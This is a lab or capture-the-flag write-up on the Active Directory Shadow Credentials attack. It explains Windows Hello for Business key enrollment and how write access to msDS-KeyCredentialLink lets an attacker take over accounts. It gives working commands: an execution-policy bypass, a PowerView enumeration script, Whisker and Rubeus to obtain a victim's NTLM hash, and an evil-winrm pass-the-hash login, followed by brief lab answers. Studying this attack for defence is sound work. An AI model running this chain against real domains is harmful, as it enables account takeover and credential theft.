In this Active Directory there are users with too many permissions. We are going to abuse those permissions to take over other user accounts.
Learning Objectives #
- Understanding Active Directory
- Introduction to Windows Hello for Business
- Prerequisites for exploiting GenericWrite privilege
- How the Shadow Credential attack works
- How to exploit the vulnerability
Overview #
These are my key takeaways from today:
- `WHfB`, Windows Hello for Business. A modern and more secure replacement for conventional password-based authentication. It uses cryptographic keys for user verification: the user unlocks access with a PIN or biometrics, and those are tied to a public/private key pair.
- `msDS-KeyCredentialLink` is an attribute on the user account in which the Domain Controller (DC) stores the public key that WHfB enrolled for a new user device.
- If an attacker is able to write to the `msDS-KeyCredentialLink` of a vulnerable user, that user can be compromised: the attacker adds their own public key to the attribute and then authenticates as the user with the matching private key. The attack needs at least one DC running Windows Server 2016 or later, and the DC needs a certificate so that Kerberos PKINIT works.
- `whisker` is an application that can update the `msDS-KeyCredentialLink` of a vulnerable user.
Enrolling a new key pair in WHfB #
- The Trusted Platform Module (TPM) creates a public/private key pair for the account. The private key never leaves the TPM and should never be disclosed.
- The client sends a certificate request so that it receives a trustworthy certificate. The organisation's CA (Certificate Authority) receives the request and issues a valid certificate.
- The public key is written into the user account's `msDS-KeyCredentialLink` attribute.
Authentication Process #
- The client authenticates with Kerberos PKINIT: it signs the pre-authentication data with its private key, and the DC verifies that signature using the raw public key stored in the `msDS-KeyCredentialLink` attribute of the user account.
- The DC issues a TGT for the user and sends it back to the client.
- The client can then use that TGT to access the domain as the user.
Enumeration #
We are specifically looking for any write privilege over a user, since the goal is to overwrite `msDS-KeyCredentialLink`.
Start with bypassing PowerShell's execution policy: `powershell -ep bypass`.
Then load PowerView into memory: `. ./PowerView.ps1`.
You can now enumerate privileges. The full command to find what we are looking for is:
`Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights`
Here `hr` is the principal (our user or one of its groups) whose ACEs we care about; the output lists every object that principal has interesting rights over. We are looking for `GenericWrite` in the `ActiveDirectoryRights` column. `GenericAll`, or `WriteProperty` scoped to `msDS-KeyCredentialLink`, is just as good, because all of them let us set that attribute.
If found, we can perform the Shadow Credentials attack.
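The one-liner above assumes you already know which principal to filter on. The following is an added example, not part of the original writeup, that generalises it: it collects the SIDs of the current user and every group it belongs to, then keeps only the ACEs that actually allow writing `msDS-KeyCredentialLink`. It assumes PowerView is already dot-sourced and that we are running as a domain user; the property names are the ones PowerView's `Find-InterestingDomainAcl` emits.

```powershell
# Added example (not from the original writeup): find every object the current
# user, directly or through group membership, can write msDS-KeyCredentialLink on.
# Assumes PowerView.ps1 is already loaded (. ./PowerView.ps1).

# SIDs we control: our own account plus every group we are a member of.
$me     = Get-DomainUser -Identity $env:USERNAME
$groups = Get-DomainGroup -MemberIdentity $env:USERNAME
$mySids = @($me.objectsid) + @($groups | ForEach-Object { $_.objectsid })

# Rights that let us set the attribute: GenericAll, GenericWrite, or WriteProperty
# that is either unscoped (no object type / "All") or scoped to the
# msDS-KeyCredentialLink attribute. With -ResolveGuids PowerView resolves the
# attribute GUID to the schema name (ms-DS-Key-Credential-Link), so match loosely.
$candidates = Find-InterestingDomainAcl -ResolveGuids |
    Where-Object {
        $mySids -contains "$($_.SecurityIdentifier)" -and
        $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty' -and
        (
            -not $_.ObjectAceType -or
            $_.ObjectAceType -eq 'All' -or
            $_.ObjectAceType -match 'Key-?Credential-?Link'
        )
    }

# Only user objects are useful targets for Shadow Credentials.
$candidates |
    Where-Object { (Get-DomainObject -Identity $_.ObjectDN).objectclass -contains 'user' } |
    Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights, ObjectAceType |
    Format-Table -AutoSize
```

Each row printed is a user we can run Whisker against; the `IdentityReferenceName` column tells you which of your group memberships grants the right, which is useful when writing up the path.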
Exploitation #
Whisker is a C# application that abuses our write access to the vulnerable user: it generates a key pair and certificate, simulates the enrollment of a malicious device, and adds the new public key to the `msDS-KeyCredentialLink` attribute.
`.\Whisker.exe add /target:NAMEOFTARGET`
Whisker prints a ready-made command to run with a C# application called Rubeus. Rubeus uses the certificate and private key that Whisker just generated to request a TGT for the target via PKINIT, and the `/getcredentials` flag in that command makes it also recover the user's NTLM hash.
That NTLM hash can be used for a pass-the-hash attack with a tool called Evil-WinRM:
`evil-winrm -i 10.10.52.167 -u USERNAME -H HASH`
Questions #
- What is the hash of the vulnerable user?
Run PowerView, Whisker and Rubeus in that order and you will get the hash.
- What is the content of flag.txt on the Administrator Desktop?
Run evil-winrm, change directory to the Administrator's Desktop and read flag.txt.